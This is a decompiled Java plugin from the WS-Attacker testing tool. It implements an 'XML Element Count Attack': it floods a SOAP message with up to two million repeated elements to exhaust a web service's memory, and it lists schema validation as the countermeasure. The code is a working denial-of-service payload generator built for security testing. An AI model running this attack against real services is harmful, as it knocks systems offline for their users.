/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.plugin.dos;

import java.util.HashMap;
import java.util.Map;
import wsattacker.main.composition.plugin.option.AbstractOption;
import wsattacker.main.composition.plugin.option.AbstractOptionInteger;
import wsattacker.main.plugin.option.OptionLimitedInteger;
import wsattacker.main.plugin.option.OptionSimpleVarchar;
import wsattacker.plugin.dos.dosExtension.abstractPlugin.AbstractDosPlugin;
import wsattacker.plugin.dos.dosExtension.option.OptionTextAreaSoapMessage;

public class XmlElementCount
extends AbstractDosPlugin {
    private static final long serialVersionUID = 1L;
    private AbstractOptionInteger numberOfElements;
    private OptionSimpleVarchar elementToInsert;

    @Override
    public void initializeDosPlugin() {
        this.initData();
        this.numberOfElements = new OptionLimitedInteger("Number of elements", 25000, "The number of elements. E.g. '3' means <X/><X/><X/>", 1, 2000000);
        this.elementToInsert = new OptionSimpleVarchar("Element to insert", "<!--X-->", "The name of the inserted element. This can also be a comment.");
        this.getPluginOptions().add((AbstractOption)this.numberOfElements);
        this.getPluginOptions().add((AbstractOption)this.elementToInsert);
    }

    public AbstractOptionInteger getOptionNumberOfElements() {
        return this.numberOfElements;
    }

    @Override
    public OptionTextAreaSoapMessage.PayloadPosition getPayloadPosition() {
        return OptionTextAreaSoapMessage.PayloadPosition.HEADERLASTCHILDELEMENT;
    }

    public void initData() {
        this.setName("XML Element Count Attack");
        this.setDescription("<html><p>This attack checks wheter or not a Web service is vulnerable to the \"XML Element Count Attack\"</p><p>A vulnerable server will run out of memory when parsing an XML document with a high element count</p><p>The attack algorithm replaces the string $$PAYLOADELEMENT$$ in the SOAP message below with the defined number of elements.</p><p>The placeholder $$PAYLOADELEMENT$$ can be set to any other position in the SOAP messageAll inserted elements have the same name as defined in parameter 8.1. All inserted elements are children of the same element</p></html>");
        this.setCountermeasures("In order to counter the attack limit the number of elements in an XML document.\n This can be achived using XML schema validation.");
    }

    @Override
    public void createTamperedRequest() {
        String soapMessage = this.getOptionTextAreaSoapMessage().getValue();
        String soapMessageFinal = "";
        StringBuilder sb = new StringBuilder("");
        for (int i = 1; i < this.numberOfElements.getValue(); ++i) {
            sb.append(this.elementToInsert.getValue());
        }
        soapMessageFinal = this.getOptionTextAreaSoapMessage().replacePlaceholderWithPayload(soapMessage, sb.toString());
        HashMap<String, String> httpHeaderMap = new HashMap<String, String>();
        for (Map.Entry<String, String> entry : this.getOriginalRequestHeaderFields().entrySet()) {
            httpHeaderMap.put(entry.getKey(), entry.getValue());
        }
        this.setTamperedRequestObject(httpHeaderMap, this.getOriginalRequest().getEndpoint(), soapMessageFinal);
    }
}

